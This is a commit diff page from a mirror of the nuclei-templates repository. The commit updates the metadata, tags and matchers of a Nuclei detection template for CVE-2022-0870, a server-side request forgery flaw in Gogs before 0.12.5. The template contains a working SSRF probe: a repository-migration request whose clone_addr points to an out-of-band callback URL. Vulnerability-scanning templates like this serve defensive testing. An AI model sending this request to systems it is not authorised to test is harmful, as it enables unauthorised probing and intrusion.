daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

updated matcher,tags

patch-1
Ritik Chaddha 2023-03-18 00:47:03 +05:30 committed by GitHub
parent f9ffbd2c38
commit 7e2a3f4d4a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
cves/2022/CVE-2022-0870.yaml
View File

@ -1,8 +1,8 @@
id: CVE-2022-0870
info:
name: Gogs < 0.12.5- Server-Side Request Forgery (SSRF)
author: theamanrawat, Akincibor
name: Gogs < 0.12.5 - Server Side Request Forgery
author: theamanrawat,Akincibor
severity: medium
description: |
Server-Side Request Forgery (SSRF) in GitHub repository gogs/gogs prior to 0.12.5.
@ -17,7 +17,7 @@ info:
cwe-id: CWE-918
metadata:
verified: "true"
tags: cve,cve2022,ssrf,gogs,auth
tags: cve,cve2022,ssrf,gogs,authenticated
requests:
- raw:
@ -44,6 +44,7 @@ requests:
_csrf={{auth_csrf}}&clone_addr=https%3A%2F%2F{{interactsh-url}}&auth_username=&auth_password=&uid=1&repo_name={{randstr}}&description=test
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
@ -51,6 +52,11 @@ requests:
- "dns"
- "http"
- type: word
part: body_1
words:
- 'content="Gogs'
extractors:
- type: regex
name: csrf